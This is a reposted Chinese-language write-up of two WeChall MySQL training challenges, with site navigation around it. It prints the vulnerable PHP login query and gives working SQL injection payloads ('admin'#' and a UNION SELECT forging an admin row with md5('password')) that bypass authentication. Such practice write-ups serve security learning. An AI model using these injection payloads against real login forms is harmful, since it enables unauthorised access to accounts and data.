[Wechall]Training:MySQL - 代码天地

[Wechall]Training:MySQL

其他 2018-08-07 16:26:27 阅读次数: 0

绕过登录MySQL I:

http://www.wechall.net/challenge/training/mysql/auth_bypass1/index.php
输入“admin’#”即可绕过，没有任何的字符过滤。账号密码一起的 :$query=”SELECT * FROM users WHERE username=’$username’ and password=’$password’”;

绕过登录MySQL II:

http://www.wechall.net/challenge/training/mysql/auth_bypass2/index.php
这里写图片描述
1.这次的跟上一道bypass不一样，账号与密码是分开验证的，并且表中的uername和password是非空的，但是没有字符串过滤。关键代码：

$password = md5($password);
$query = "SELECT * FROM users WHERE username='$username'";//当存在username执行查询###注入关键点###
if (false === ($result = $db->queryFirst($query))) {//返回查询结果第一行
    echo GWF_HTML::error('Auth2', $chall->lang('err_unknown'), false);
    return false;
}       
#############################
### This is the new check ###
if ($result['password'] !== $password) {//密码验证####注入关键点####
    echo GWF_HTML::error('Auth2', $chall->lang('err_password'), false);
return false;
} #  End of the new code  ###

2.我们知道select可以选择常量，比如select null,’232’,’988’结果为：
这里写图片描述
使用以下查询：select * from ‘users’ where 1 union select null,’admin’,’password’结果为：

3.利用这种思想可以解决这道题。但是需注意三个问题。
第一，源代码要求返回结果集的第一行，在select * from ‘users’ where username=’admin’ union select null,’admin’,’password’中让第一个select条件为假即可。
第二，注意到MD5，所以应该将password改为md5(‘password’)。
第三，注意闭合单引号。
Username:xx’ union select null,’admin’,md5(‘password’) where ‘a’=’a
Password:password

猜你喜欢

转载自blog.csdn.net/weixin_36525275/article/details/70471471

[Wechall]Training:MySQL

[WeChall] Training: MySQL I (MySQL, Exploit, Training)

WeChall Training: Crypto - Transposition I

[WeChall] Training: Crypto - Caesar I (Crypto, Training)

[WeChall] Training: Encodings I (Training, Encoding)

**WeChall:Training: Register Globals (Exploit, PHP, Training)**

WeChall Training:Crypto-Caesar WriteUp

9.Wechall-------------Training: Programming 1 by Gizmore（得分2个）

8.Wechall-------------Training: Encodings I by Gizmore（得分2个）

5.Wechall-------------Training: ASCII by Gizmore（得分1个）

13.Wechall——Training: PHP LFI by Gizmore（得分2个）

4.Wechall-------------Training: WWW-Robots by Gizmore（得分1个）

12.Wechall-------------Training: Regex by Gizmore（3级）（得分2个）

11.Wechall-------------Training: Regex by Gizmore（2级）（得分2个）

10.Wechall-------------Training: Regex by Gizmore（1级）（得分2个）

MySQL Training Summary

MySQL SQL Training

Training: MySQL I

Wechall 部分WP

weChall-Stop us

ctf-wechall-Crypto

WeChall Stegano Attachment

WeChall PHP-0817

wechall-部分题解

wechall - Prime Factory

谈谈Wechall几道题

weChall-Warchall Live RCE

Wechall.No_Escape write up

Wechall Challenges Writeup & 知识拓展

0x00 Wechall writeup

今日推荐

TIOBE 5 月榜单：Fortran “复活”进入 Top 10

GCC 14.1 发布

面壁智能发布 Eurux-8x22B 开源大模型 —— 堪称「理科状元」

开源日报 | 谷歌扶持鸿蒙上位；开源Rabbit R1；Docker加持的安卓手机；微软的焦虑和野心；海尔电器把开放平台关了

中国码农的“35岁魔咒”

蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版，免费下载

Arc Browser for Windows 1.0 正式 GA

90后程序员开发视频搬运软件、不到一年获利超 700 万，结局很刑！

周排行

基本数据类型封装类比较 Java源码解读(一) 8种基本类型对应的封装类型

JS实现无缝滚动上

深入解析HashMap原理（基于JDK1.8）

mysql的连接池

关于.htc

linux下的ubuntu12.04图形界面

【数论】好推不好记的扩展欧几里德

设备树详解

cscope + tags 简单设置

xml学习

每日归档

更多

2024-05-09(35)

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)

2024-05-05(0)

2024-05-04(7)

2024-05-03(19)

2024-05-02(0)

2024-05-01(4)

2024-04-30(1)